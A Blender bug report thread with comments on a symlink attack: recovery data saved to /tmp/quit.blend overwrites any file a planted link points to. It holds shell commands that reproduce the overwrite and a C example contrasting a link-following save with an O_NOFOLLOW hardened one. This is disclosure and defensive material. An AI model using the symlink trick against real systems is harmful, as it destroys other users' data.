
possible symlink attack in blender 2.5
Closed, Invalid (Public)

Description
Blender is subject to a symlink attack when the user closes the app without saving their changes. The consequences are that an attacker-determined file owned by the victim is overwritten with a .blend file, destroying whatever data was in the file in the process.

Version 2.49.2 isn't vulnerable to this attack since it uses ~/.blender/quit.blend instead of /tmp/quit.blend. I would suggest this behaviour be restored before Blender 2.5 is released.

pabs@chianamo:~$ sudo ln -s /home/pabs/foo /tmp/quit.blend
[sudo] password for pabs:
pabs@chianamo:~$ ls -l /tmp/quit.blend /home/pabs/foo
ls: cannot access /home/pabs/foo: No such file or directory
lrwxrwxrwx 1 root root 14 Jun 5 13:51 /tmp/quit.blend -> /home/pabs/foo
pabs@chianamo:~$ file /tmp/quit.blend /home/pabs/foo
/tmp/quit.blend: symbolic link to `/home/pabs/foo'
/home/pabs/fooo: ERROR: cannot open `/home/pabs/foo' (No such file or directory)
pabs@chianamo:~$ blender
Ob 'Camera' - Successfully removed 0 keyframes
*bpy stats* - tot exec: 5728, tot run: 0.4375sec, average run: 0.000076sec, tot usage 1.4299%
Saved session recovery to /tmp/quit.blend

Blender quit
pabs@chianamo:~$ ls -l /tmp/quit.blend /home/pabs/foo
-rw-r----- 1 pabs pabs 78K Jun 5 13:53 /home/pabs/foo
lrwxrwxrwx 1 root root 14 Jun 5 13:51 /tmp/quit.blend -> /home/pabs/foo
pabs@chianamo:~$ file /tmp/quit.blend /home/pabs/foo
/tmp/quit.blend: symbolic link to `/home/pabs/foo'
/home/pabs/foo: Blender3D, saved as 64-bits little endian with version 2.50.0007
pabs@chianamo:~$ echo foo > /home/pabs/foo
pabs@chianamo:~$ ls -l /tmp/quit.blend /home/pabs/foo
-rw-r----- 1 pabs pabs 4 Jun 5 14:00 /home/pabs/foo
lrwxrwxrwx 1 root root 14 Jun 5 13:51 /tmp/quit.blend -> /home/pabs/foo
pabs@chianamo:~$ file /tmp/quit.blend /home/pabs/foo
/tmp/quit.blend: symbolic link to `/home/pabs/foo'
/home/pabs/foo: ASCII text
pabs@chianamo:~$ blender
*bpy stats* - tot exec: 648, tot run: 0.0677sec, average run: 0.000104sec, tot usage 0.4556%
Saved session recovery to /tmp/quit.blend

Blender quit
pabs@chianamo:~$ file /tmp/quit.blend /home/pabs/foo
/tmp/quit.blend: symbolic link to `/home/pabs/foo'
/home/pabs/foo: Blender3D, saved as 64-bits little endian with version 2.50.0007
pabs (Paul Wise) set Type to Bug. Via Old World, Jun 5 2010, 8:25 AM
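The overwrite in the session above comes from opening a predictable path in a shared directory in a way that follows links. The following is an added example, not Blender's code and not part of the report: it contrasts a link-following save with one that uses O_NOFOLLOW and checks the opened file, using hypothetical function names and a constructed scratch directory.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Behaviour shown in the report: open() follows a symlink sitting at path. */
static int save_following_links(const char *path, const char *data) {
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0) return -1;
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n < 0 ? -1 : 0;
}

/* Hardened save: refuse a symlink at path, then vet the file actually opened. */
static int save_refusing_links(const char *path, const char *data) {
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW, 0600); /* ELOOP on a symlink */
    if (fd < 0) return -1;
    /* Truncate only a regular file we own that has no other hard links. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != geteuid() ||
        st.st_nlink != 1 || ftruncate(fd, 0) != 0) { close(fd); return -1; }
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n < 0 ? -1 : 0;
}

/* Constructed demo: quit.blend links to a 4-byte victim; returns its size after save(). */
static long victim_size_after(int (*save)(const char *, const char *)) {
    char dir[] = "/tmp/symlink-demo-XXXXXX", victim[64], link_path[64];
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link_path, sizeof link_path, "%s/quit.blend", dir);
    if (save_following_links(victim, "foo\n") != 0 || symlink(victim, link_path) != 0) return -1;
    save(link_path, "constructed recovery data\n");
    long size = stat(victim, &st) == 0 ? (long)st.st_size : -1;
    unlink(link_path); unlink(victim); rmdir(dir);
    return size;
}

int main(void) {
    printf("plain open: victim is %ld bytes\n", victim_size_after(save_following_links));
    printf("O_NOFOLLOW: victim is %ld bytes\n", victim_size_after(save_refusing_links));
    return 0;
}
```

O_NOFOLLOW only covers the final path component, so this check complements, rather than replaces, keeping the recovery file in a per-user directory as the report suggests.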
broken (Matt Ebb) added a comment. Via Old World, Jun 7 2010, 10:13 AM
Hi, revision of the way blender finds directory/file paths for these kinds of resource files is currently in development, and will allow customisation of these with environment variables. Technically this functionality is doing what it is designed to do, so it's not really a bug (there are many more 'security' issues in blender than this).

Incidentally, I'm not sure why 2.49 was saving in ~/.blender/ for you, afaik it has always saved in /tmp, perhaps you didn't have write access there or something.

Closing this report, thanks.
broken (Matt Ebb) closed this task as "Invalid". Via Old World, Jun 7 2010, 10:13 AM
pabs (Paul Wise) added a comment. Via Old World, Jun 7 2010, 10:33 AM
According to the Debian maintainer, 2.49 was patched in Debian to save into the right directories and avoid the security issues but the 2.50 version in Debian experimental dropped those patches:

http://bugs.debian.org/584621
http://git.debian.org/?p=collab-maint/blender.git;a=blob;f=debian/NEWS;hb=experimental

In any case, it is a shame that the blender project isn't interested in fixing security issues, no matter how minor they might seem.
pabs (Paul Wise) added a comment. Via Old World, Sep 5 2012, 4:39 PM
This bug is still present in blender 2.63a; it would be great if it were fixed.
